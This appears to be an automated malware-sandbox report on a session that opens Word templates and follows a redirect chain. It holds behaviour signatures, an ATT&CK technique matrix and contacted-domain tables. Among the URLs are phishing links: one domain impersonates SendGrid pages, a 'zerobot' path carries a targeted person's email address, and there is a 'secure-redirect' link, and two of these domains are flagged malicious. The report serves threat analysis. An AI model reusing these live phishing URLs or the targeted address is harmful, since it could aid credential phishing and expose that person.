    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item2.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps3.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item3.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item3.xml.rels
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = docProps/custom.xml
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
    Source: Insight design set.dotx.0.drInitial sample: OLE indicators vbamacros = False

    Persistence and Installation Behavior

    barindex
    Source: Office documentLLM: Office document contains QR code
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Process Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Scripting
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS Memory1
    File and Directory Discovery
    Remote Desktop ProtocolData from Removable Media1
    Web Protocols
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt1
    Registry Run Keys / Startup Folder
    1
    Extra Window Memory Injection
    1
    Extra Window Memory Injection
    Security Account Manager1
    System Information Discovery
    SMB/Windows Admin SharesData from Network Shared Drive3
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging5
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://mazans.com/https://sendgrid.com/error/etc.clientlibs/sendgrid/clientlibs/clientlib-site.lc-47fa670601ba9b5db3afd22023c57f06-lc.min.js0%Avira URL Cloudsafe
    https://sepedatua.com/158983/secure-redirect0%Avira URL Cloudsafe
    https://mazans.com/https://sendgrid.com/error/etc.clientlibs/core/wcm/components/commons/datalayer/v1/clientlibs/core.wcm.components.commons.datalayer.v1.lc-70264651675213ed7f7cc5a02a00f621-lc.min.js0%Avira URL Cloudsafe
    https://sepedatua.com/158983/secure-redirect/0%Avira URL Cloudsafe
    https://mazans.com/WEB-ID-6672849687924/zerobot?email=Pmendon.ext@goeasy.com0%Avira URL Cloudsafe
    https://mazans.com/https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-site.lc-65e4613a26158083e3e99e53ac7ff36f-lc.min.js0%Avira URL Cloudsafe
    https://mazans.com/https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js0%Avira URL Cloudsafe
    https://mazans.com/content/dam/sendgrid/core-assets/social/favicon-32x32.png0%Avira URL Cloudsafe
    https://mazans.com/https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css0%Avira URL Cloudsafe
    https://mazans.com/https://sendgrid.com/error/etc.clientlibs/sendgrid/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css0%Avira URL Cloudsafe
    https://mazans.com/content/dam/sendgrid/core-assets/social/site.webmanifest0%Avira URL Cloudsafe
    https://mazans.com/https://sendgrid.com/error/etc.clientlibs/sendgrid/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js0%Avira URL Cloudsafe
    https://mazans.com/https://sendgrid.com/error/etc.clientlibs/clientlibs/granite/jquery.lc-f9e8e8c279baf6a1a278042afe4f395a-lc.min.js0%Avira URL Cloudsafe
    https://mazans.com/https://sendgrid.com/error/etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.js0%Avira URL Cloudsafe
    https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.com0%Avira URL Cloudsafe
    https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect0%Avira URL Cloudsafe
    https://mazans.com/content/dam/sendgrid/core-assets/social/favicon-96x96.png0%Avira URL Cloudsafe
    https://mazans.com/https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-site.lc-91a9f83e57a9c0ac9996388c5a881204-lc.min.css0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    jscloud.net
    104.26.5.39
    truefalse
      high
      d2fashanjl7d9f.cloudfront.net
      18.66.102.15
      truefalse
        high
        global.px.quantserve.com
        91.228.74.166
        truefalse
          high
          mazans.com
          162.241.85.172
          truefalse
            high
            obseu.powerrobotflower.com
            54.75.69.192
            truefalse
              high
              adobetarget.data.adobedc.net
              66.235.152.156
              truefalse
                high
                d296je7bbdd650.cloudfront.net
                99.86.8.175
                truefalse
                  high
                  scontent.xx.fbcdn.net
                  157.240.0.6
                  truefalse
                    high
                    c.ba.contentsquare.net
                    46.137.111.148
                    truefalse
                      high
                      294-tkb-300.mktoresp.com
                      192.28.147.68
                      truefalse
                        high
                        www.google.com
                        142.250.186.100
                        truefalse
                          high
                          api.segment.io
                          44.234.198.184
                          truefalse
                            high
                            t.contentsquare.net
                            18.244.18.115
                            truefalse
                              high
                              windowsupdatebg.s.llnwi.net
                              87.248.205.0
                              truefalse
                                high
                                star-mini.c10r.facebook.com
                                157.240.253.35
                                truefalse
                                  high
                                  sepedatua.com
                                  103.134.152.12
                                  truetrue
                                    unknown
                                    cdn.heapanalytics.com
                                    13.32.27.86
                                    truefalse
                                      high
                                      euob.powerrobotflower.com
                                      143.204.98.11
                                      truefalse
                                        high
                                        s-part-0017.t-0009.t-msedge.net
                                        13.107.246.45
                                        truefalse
                                          high
                                          r.neurotags.net
                                          34.168.114.70
                                          truetrue
                                            unknown
                                            ax-0001.ax-msedge.net
                                            150.171.27.10
                                            truefalse
                                              high
                                              consent.trustarc.com
                                              13.225.78.57
                                              truefalse
                                                high
                                                heapanalytics.com
                                                3.219.22.30
                                                truefalse
                                                  high
                                                  dualstack.reddit.map.fastly.net
                                                  151.101.129.140
                                                  truefalse
                                                    high
                                                    reddit.map.fastly.net
                                                    151.101.129.140
                                                    truefalse
                                                      high
                                                      googleads.g.doubleclick.net
                                                      142.250.181.226
                                                      truefalse
                                                        high
                                                        td.doubleclick.net
                                                        142.250.185.98
                                                        truefalse
                                                          high
                                                          ib.anycast.adnxs.com
                                                          185.89.210.122
                                                          truefalse
                                                            high
                                                            alb.reddit.com
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              a.quora.com
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                secure.adnxs.com
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  w3-reporting-nel.reddit.com
                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    rules.quantcount.com
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      twilio.tt.omtrdc.net
                                                                      unknown
                                                                      unknownfalse
                                                                        high
                                                                        s.clarity.ms
                                                                        unknown
                                                                        unknownfalse
                                                                          high
                                                                          cdn.segment.com
                                                                          unknown
                                                                          unknownfalse
                                                                            high
                                                                            pixel-config.reddit.com
                                                                            unknown
                                                                            unknownfalse
                                                                              high
                                                                              b.6sc.co
                                                                              unknown
                                                                              unknownfalse
                                                                                high
                                                                                j.6sc.co
                                                                                unknown
                                                                                unknownfalse
                                                                                  high
                                                                                  c.clarity.ms
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    high
                                                                                    q.quora.com
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      high
                                                                                      www.facebook.net
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        high
                                                                                        www.facebook.com
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          high
                                                                                          rum.hlx.page
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            high
                                                                                            www.redditstatic.com
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              high
                                                                                              c.6sc.co
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                high
                                                                                                assets.adobedtm.com
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  high
                                                                                                  www.clarity.ms
                                                                                                  unknown
                                                                                                  unknownfalse
                                                                                                    high
                                                                                                    www.linkedin.com
                                                                                                    unknown
                                                                                                    unknownfalse
                                                                                                      high
                                                                                                      secure.quantserve.com
                                                                                                      unknown
                                                                                                      unknownfalse
                                                                                                        high
                                                                                                        pixel.quantserve.com
                                                                                                        unknown
                                                                                                        unknownfalse
                                                                                                          high
                                                                                                          px.ads.linkedin.com
                                                                                                          unknown
                                                                                                          unknownfalse
                                                                                                            high
                                                                                                            connect.facebook.net
                                                                                                            unknown
                                                                                                            unknownfalse
                                                                                                              high
                                                                                                              munchkin.marketo.net
                                                                                                              unknown
                                                                                                              unknownfalse
                                                                                                                high
                                                                                                                snap.licdn.com
                                                                                                                unknown
                                                                                                                unknownfalse
                                                                                                                  high
                                                                                                                  c.contentsquare.net
                                                                                                                  unknown
                                                                                                                  unknownfalse
                                                                                                                    high
                                                                                                                    ipv6.6sc.co
                                                                                                                    unknown
                                                                                                                    unknownfalse
                                                                                                                      high
                                                                                                                      NameMaliciousAntivirus DetectionReputation
                                                                                                                      https://mazans.com/https://sendgrid.com/error/etc.clientlibs/core/wcm/components/commons/datalayer/v1/clientlibs/core.wcm.components.commons.datalayer.v1.lc-70264651675213ed7f7cc5a02a00f621-lc.min.jsfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://mazans.com/content/dam/sendgrid/core-assets/social/site.webmanifestfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
